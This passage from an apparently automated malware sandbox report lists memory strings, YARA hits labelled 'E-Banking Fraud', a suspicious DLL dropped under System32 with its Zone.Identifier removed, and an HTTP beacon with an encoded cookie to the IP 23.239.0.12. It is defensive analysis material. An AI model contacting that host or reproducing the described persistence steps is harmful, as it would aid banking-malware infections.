                      Source: svchost.exe, 0000000B.00000002.331324173.000001430AC5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000B.00000003.330667118.000001430AC4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.330844563.000001430AC41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.331297688.000001430AC42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 0000000B.00000003.330766654.000001430AC62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 0000000B.00000002.331292008.000001430AC3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000B.00000003.308527918.000001430AC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 00000022.00000003.603804588.000001C02EE03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.603777831.000001C02EE02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.603863331.000001C02E99E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.603876739.000001C02E9AF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.603935483.000001C02E981000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.604008451.000001C02EE19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.hotspotshield.com/
                      Source: svchost.exe, 0000000B.00000002.331292008.000001430AC3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 0000000B.00000002.331180065.000001430AC13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.331292008.000001430AC3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000B.00000003.308527918.000001430AC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000B.00000003.330825032.000001430AC40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.330839063.000001430AC45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000B.00000003.308527918.000001430AC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 0000000B.00000002.331285339.000001430AC39000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.308527918.000001430AC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 0000000B.00000002.331313344.000001430AC53000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.330667118.000001430AC4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                      Source: svchost.exe, 00000022.00000003.607654465.000001C02E986000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.607561946.000001C02E986000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.607667402.000001C02E9A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 00000022.00000003.607654465.000001C02E986000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.607561946.000001C02E986000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.607667402.000001C02E9A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 00000022.00000003.603804588.000001C02EE03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.603777831.000001C02EE02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.603863331.000001C02E99E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.603876739.000001C02E9AF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.603935483.000001C02E981000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.604008451.000001C02EE19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hotspotshield.com/terms/
                      Source: svchost.exe, 00000022.00000003.603804588.000001C02EE03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.603777831.000001C02EE02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.603863331.000001C02E99E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.603876739.000001C02E9AF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.603935483.000001C02E981000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.604008451.000001C02EE19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pango.co/privacy
                      Source: svchost.exe, 00000022.00000003.612211352.000001C02E9B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.612250990.000001C02E99C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.612239431.000001C02E9B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.612292728.000001C02E981000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.612315449.000001C02EE02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800132F0 InternetReadFile,RtlAllocateHeap,
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: xuG=xWaVIxmlebPbaJHEIrQ0fbxnFEn0sAEIgsR7w9CORqGcUqZA2KwjTd6krDnDc9qkAviibKLZfZRfbo7cmq/KNi4xlyyeQT/8Gu8lVgMPU7K3+hrHswvKNj2B24KCO5h/6sGu973IP8je50zJyXAsyjPYnfHQxjlHj0xvdafXFdGJFICGaLkLQ8Nz5i5OsAykpKaioQ8/NvfSOL+0fL6dpyaj0oeOBABb2y4wbF6z/zqO6lfB5AeRctJlQvM2mgX5D70Pz8DrXIY+RK1/9np5WQ==Host: 23.239.0.12Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTPS traffic detected: 23.239.0.12:443 -> 192.168.2.3:49754 version: TLS 1.2

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 4.2.rundll32.exe.1e219be0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.rundll32.exe.1f1cbe10000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.2490000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.rundll32.exe.1f1cbe10000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.1e219be0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1fdec700000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1fdec700000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.rundll32.exe.1f1cbe10000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.1f1cbe10000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.6e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.1f1cbe10000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.2490000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.6e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.rundll32.exe.1f1cbe10000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.298205207.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.808360106.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.329868359.000001F1CBE10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.808194532.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.298619833.000001FDEC700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.299143403.000001E219BE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.329600804.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.304106272.000001F1CBE10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.303897214.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.304900388.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.302181503.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.298411789.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.301146788.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.305651593.000001F1CBE10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 992 -s 316
                      Source: C:\Windows\System32\regsvr32.exeFile deleted: C:\Windows\System32\JRkpZLNCkFz\TYmfFCbFTVEkATZ.dll:Zone.IdentifierJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\JRkpZLNCkFz\Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D4EB60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D4AF70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D4FB6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D46F0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D4E6C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D4A77C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D4895C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D45944
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D4FCA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D4AA0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D4B5CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_006D0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180010FF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180028C20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002C058
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180009100
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180007958
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000C608
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180021618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180013E28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001E3AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001DBE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001FC0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000580C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180022010
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001481C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002A42C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180011834
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180023831
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180021C3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000703C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000AC48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000FC48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180006458
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001C05C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001A460
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180029888
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001D49C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180008CA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800248A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180015CB0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800124B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000C4B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800288B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800024B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000D8C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800250CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800190D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180017CE4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800264F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800014F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180020CFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002C904
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180017908
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180021510
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F917
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000551C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F128
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001CD38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180016D3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001F944
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180018148
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001D950
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180013150
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001ED50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001E960
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019D60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001C964
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180001D68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001496C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180002D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180002178
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180024D80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180018598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180003598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002A9A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800119A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180025DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180018DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800269B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800059B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800029BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800141C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800125C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800121CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800075D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800095DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F9E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180002610
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001FA38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000A270
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019E78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001DA80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180024698
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000EE98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800176B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001AAB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180011AD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180008AD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800296EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000A6EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800132F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019300
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BB04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002870C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180026B10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000131C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000671C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180029B28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180012F28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000BB28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001EB30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180020334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180010758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001435C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180009F5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180029368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180020768
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180017378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180013780
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180015388
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000338C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000738C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180002790
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180027F9C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800197A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002C7B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001DFB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001F7C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800097C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800157D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019FDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180017BDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F7E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180001FE0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180010FF4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002C058
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180009100
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000C608
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180021618
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001E3AC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001DBE8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001FC0C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000580C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180022010
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001481C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002A42C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180011834
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180021C3C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000703C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000AC48
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000FC48
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180006458
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001C05C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001A460
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180029888
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001D49C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180008CA0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800248A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180015CB0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800124B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000C4B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800288B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800024B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000D8C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800250CC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800190D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180017CE4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800264F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800014F8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180020CFC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002C904
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180017908
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180021510
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000F917
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000551C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000F128
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001CD38
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180016D3C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001F944
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180018148
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001ED50
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180013150
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001D950
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001E960
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180019D60
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001C964
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180001D68
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001496C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180002D70
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180002178
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180024D80
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180018598
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180003598
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002A9A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800119A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180025DAC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180018DAC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800269B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800059B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800029BC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800141C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800125C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800121CC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800075D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800095DC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000F9E8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180002610
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180019618
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180013E28
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001FA38
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000A270
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180019E78
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001DA80
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180024698
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000EE98
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800176B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001AAB8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180011AD0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180008AD8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800296EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000A6EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800132F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180019300
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001BB04
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002870C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180026B10
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000131C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000671C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180029B28
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180012F28
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000BB28
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001EB30
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180020334
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180010758
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001435C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180009F5C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180029368
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180020768
